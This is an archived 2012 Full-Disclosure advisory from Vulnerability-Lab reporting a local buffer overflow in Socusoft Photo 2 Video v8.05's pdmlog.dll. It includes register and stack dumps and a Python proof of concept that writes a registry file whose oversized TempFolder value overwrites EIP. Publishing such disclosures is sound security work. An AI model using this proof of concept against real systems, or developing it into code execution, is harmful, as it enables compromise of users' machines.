[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability
From: "research () vulnerability-lab ! com" <research () vulnerability-lab ! com>
Date: 2012-02-27 16:20:45
Message-ID: 4F4BAD5D.4050501 () vulnerability-lab ! com
[Download RAW message or body]
Title:
======
Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability
Date:
=====
2012-02-27
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=460
VL-ID:
=====
460
Introduction:
=============
Socusoft photo to video converter Professional allows you to create all kinds of eye-catching
slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264, h.264 HD, 3gp, 3gpp2, swf ) playable on \
YouTube, Facebook, MySpace, iPod, iPad, iphone, Archos, PSP, Zune. With the powerful Photo to \
Video Converter Professional,you could convert photo to the animating and dynamic video and \
share the video on YouTube, Facebook, MySpace, iPod, iPad, iPhone. With just a few minutes of \
work, you\\\'ll have an eye-catching slideshow video with background music and dynamic \
pan&zoom and attractive transition effects. This powerful Photo to Video Converter \
Professional supports Over 260 animating transition effects with Pan & Zoom effect.
(Copy of the Vendor Homepage: )
Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on \
Socusofts Photo to Video Converter Free and Professional v8.05
Report-Timeline:
================
2012-02-27: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Socusoft Photo 2 Video v8.05
Exploitation-Technique:
=======================
Local
Severity:
=========
High
Details:
========
A Buffer Overflow vulnerability is detected on Socusoft Photo to Video Converter Free and \
Professional v8.05 (current version). The vulnerability is located in the pdmlog.dll. \
Successful exploitation can result in execution of code, overwrite of registers & system \
compromise.
Vulnerable DLL(s):
[+] pdmlog.dll
--- Registers ---
# EAX 42424242
# EBX 00360000 pdmlog.dll:00360000
# ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B
# EDX 80284006
# ESI 00000002
# EDI 00000000
# EBP 01C5FC0C Stack[000001AC]:01C5FC0C
# ESP 01C5FBF0 Stack[000001AC]:01C5FBF0
# EIP 42424242
# EFL 00010206
--- Stack ---
# 01C5FBE0 00000000
# 01C5FBE4 00000002
# 01C5FBE8 000094B7
# 01C5FBEC 00000001
# 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F <- Crash
# 01C5FBF4 00360000 pdmlog.dll:00360000
# 01C5FBF8 00000002
# 01C5FBFC 00000000
# 01C5FC00 00000000
# 01C5FC04 01C5FC20 Stack[000001AC]:01C5FC20
# 01C5FC08 7FFDE000 debug066:7FFDE000
--- Dump ---
# 00370584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
# 00370594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
# 003705A4 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC
# 003705B4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
# 003705C4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
Picture(s):
../1.png
Proof of Concept:
=================
The Vulnerability can be exploited by local attackers. For demonstration or reproduce ...
#!/usr/bin/python
# Exploit Title: Socusoft Photo to Video Converter Free/Pro v8.05 (pdmlog.dll) Local Buffer \
Overflow PoC # Version: 8.05
# Date: 2012-02-26
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.socusoft.com
# Tested on: Windows XP SP3 Professional German
# Notes: Overflow occurs in pdmlog.dll
# Howto: Import Reg -> Start App
# EAX 42424242
# EBX 00360000 pdmlog.dll:00360000
# ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B
# EDX 80284006
# ESI 00000002
# EDI 00000000
# EBP 01C5FC0C Stack[000001AC]:01C5FC0C
# ESP 01C5FBF0 Stack[000001AC]:01C5FBF0
# EIP 42424242
# EFL 00010206
# 01C5FBE0 00000000
# 01C5FBE4 00000002
# 01C5FBE8 000094B7
# 01C5FBEC 00000001
# 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F <- Crash
# 01C5FBF4 00360000 pdmlog.dll:00360000
# 01C5FBF8 00000002
# 01C5FBFC 00000000
# 01C5FC00 00000000
# 01C5FC04 01C5FC20 Stack[000001AC]:01C5FC20
# 01C5FC08 7FFDE000 debug066:7FFDE000
file="poc.reg"
junk1="\x41" * 548
boom="\x42\x42\x42\x42"
junk2="\x43" * 100
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free \
Version\General]\n" poc=poc + "\"TempFolder\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(-).
Credits:
========
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. Any modified copy or reproduction, including partially usages, of \
this file requires authorization from Vulnerability- Lab. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2012|Vulnerability-Lab
--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic